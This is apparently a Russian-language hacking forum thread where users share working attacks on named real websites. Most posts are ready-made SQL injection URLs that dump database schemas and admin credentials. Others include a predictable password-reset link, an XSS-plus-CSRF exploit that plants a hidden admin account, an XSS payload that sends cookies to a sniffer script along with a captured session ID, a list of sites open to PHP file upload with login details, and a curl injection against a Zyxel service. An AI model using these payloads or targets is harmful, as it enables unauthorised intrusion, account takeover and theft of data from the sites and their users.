Саит http://www.francophonie.utm.md/ Уязвимость: SQL Injection Сплоит http://www.francophonie.utm.md/?mop=15&idnews=15+union+select+1,2,3,user(),5,version(),7,8+--+
Code: http://kupigut.ru/shop.php?id=-fashionid%27+union+all+select+1,2,3,4,5,6,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),8,9,10,11,12+--+ Тип: SQL Injection. ========================================================== Code: http://hd-ural.ru/news.php?news_id=-48+union+all+select+1,2,3,4,5,6,7,8,9,10,11,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),13,14+--+ Тип: SQL Ijection (вывод в title, Cntr+u) ========================================================== Code: http://allrose.ru/category.php?id=-1%27+union+all+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)+--+ Тип: SQL Injection
ТИЦ: 10 PR: 2 Code: ttp://heteroworld.com/view_news.php?id=-455%27+union+select+1,concat_ws(database(),user(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+ Вывод таблиц: Code: ttp://heteroworld.com/view_news.php?id=-455%27+union+select+1,user(),3,4,5,6,7,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),9,10,11,12,13,14,15,16+--+ Вывод админа: Code: ttp://heteroworld.com/view_news.php?id=-455%27+union+select+1,user(),3,4,5,6,7,concat_ws(0x3,username,password),9,10,11,12,13,14,15,16+from+heterodrugs.users+--+ Version (5.5.49-cll-lve) Database (heterodrugs) User (hetero582016@localhost) Для простоты действий: ttp://heteroworld.com/cpanel/ ttp://heteroworld.com/info.php P.S в Cpanel с этими данными так и не смог зайти. Кто зальётся отпишитесь=)
Запрещено постить уязвимости на сайтах стран СНГ (ru, by, ua). Для наглядности баллы будут в ручном режиме добавляться в таблицу: https://yarbabin.ru/antichat/ - нет никакой статистики.
Предсказываем отправлений url при восстановлении пароля md5(time()) взламываем любои аккаунт Code: https://www.andys.md/ro/pages/login/ http://www.andys.md/pages/restore_pass/24aedcd90a28ae58303e0a8b8906137b/
2 XSS и 1 CSRF беспалевный взлом, Исправили но все таки раскажу ) При осуществление заказа поле имя уязвимо к xss которая срабатывает в панели администратора Code: http://supergut.md/ru/pages/cart/3/ Сколько я бы не старался украсть куки они не работали незнаю почему (HttpOnly небыл выставлен к кукам и по IP тоже небыло ограничении) Решил попробовать CSRF атаку потому что структура админ панели мне было известно, а именно POST CSRF на добавление админа так выглядел сплоит Code: <html> <head> </head> <body onload='document.forms.csrf.submit();'> <form action="http://supergut.md/cp/newuser/" name="csrf" method="POST" target="iframe"> <input type="hidden" name="login" value="<style>tr:last-child{display:none;}</style>"> <input type="hidden" name="newp" value="1"> <input type="hidden" name="newp1" value="1"> </form> <iframe src="" style="display:none;" name="iframe" ></iframe> </body> </html> Почему в логине Code: <style>tr:last-child{display:none;}</style> потому что так я мог добавлять невидимого юзера через другую инекцию в админке спрятав последнюю строку таблице Далее я решил использовать и ту же xss из поле имя чтоб средиректить админа на мою CSRF сделал так Code: <script> location="http://host/csrf.html"; </script> Не прошло и 5 минут я был уже в админке После этого была оповещена администрация которая на 2 день профиксела
Восстановление пароля, "не помню номер телефона"(если такое выскачило, то привязана), вводишь данные страницы, ФИО и получаешь ответ на свой вопрос.
MD5( 123456 ) = e10adc3949ba59abbe56e057f20f883e Я думал, этот хэш все знают наизусть. Смысл его замазывать?)
Сайт:http://www.vacbanned.com Уязвимость: SQL Injection Эксплойт: Code: http://www.vacbanned.com:80/view/detail/id/76561197960265741) AND 3612=3612 AND (8789=8789 MySQL > 5.0.11 available databases [3]: [*] information_schema [*] vacbanned_dev [*] vacbanned_v2
Засунул в инпутах фейка https://wf-code.ru Code: "><script>img = new Image(); img.src = "/snif.php?c="+document.cookie+window.location.href;</script><" Пришло Code: Cookie: PHPSESSID=a593cdb6707d2f5992dba251c386c994https://wf-code.ru/yaadmin/full.php Саит с доменом .ru но думаю простимо потому что фейк
SSRF Подъехала Code: https://us.hidester.co Spoiler Кто сможет перейти на другой протокол пишите метод
Arbitrary file upload 1.php.asd Code: http://ecaterix.md/ecaterix.md/kcfinder/browse.php http://www.basukiwater.com/assets/js/mylibs/kcfinder/browse.php http://www.oonohousing.com/member/user/kcfinder/browse.php http://www.golfoldcourse.com/kcfinder/browse.php http://www.careersinmorocco.com/www3/assets/js/ckeditor/kcfinder/browse.php http://dinamikadwiputraperkasajaya.com/admin/assets/kcfinder/browse.php http://grossiste-tissus.fr/ckeditor/kcfinder/browse.php http://ex-theatreasia.com/kcfinder/browse.php http://tohmei-group.sakura.ne.jp/user_data/packages/admin/js/kcfinder/browse.php http://www.urfaposet.com/panel/kcfinder/browse.php http://www.raksthai.org/asset/kcfinder/ http://www.godimex.pl/sklep/design/_js_libs/ckeditor/kcfinder/browse.php http://hadu.org/kcfinder/browse.php Гуглом можно насобирать сайтов
Можем загружать PHP фаилы L:fm_admin P:fm_admin Code: http://ecaterix.md/ecaterix.md/kcfinder/upload/files/filemanager.php.asd
там оно всё дырявое куда не ткни... писать бесполезно - пишут, что всё починили и всё работает. Spoiler: Onesecurity - unsecure Code: curl -s -k --proxy socks5://127.0.0.1:9150 http://onesecurity.zyxel.com/php/wizard.php --data "instruction=get_wizards¶meters%5Btype%5D=z%27 union select 1,@@version--+¶meters%5Bdirection%5D=DESC¶meters%5Bget_active%5D=true" "Microsoft SQL Server 2005 - 9.00.5057.00 (Intel X86) Mar 25 2011 13:50:04 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 6.0 (Build 6002: Service Pack 2)"
Spoiler http://polisk.kiev.ua/prod_download.php?id=1+and+false+UnIoN SELect 1,2,user(),4&ext= http://sclass.kiev.ua/im.php?show=groupsrecifications&kod_group=10)+/*!12345UnIoN*/+SeLEcT+user()+--+-&specifications=W126'' http://xenon77.com.ua/production_list.php?id=-1+UnIoN+SeLEct+1,2,3,4,user(),6,7,8 http://www.newchemistry.ru/himbases...,table_name,0x3a,column_name))),@))),3,4+--+-
+ sql inject Code: http://www.task.ua/funds/?id=1&language='and updatexml(NULL,concat(0x0a,(SELECT database())),Null)-- -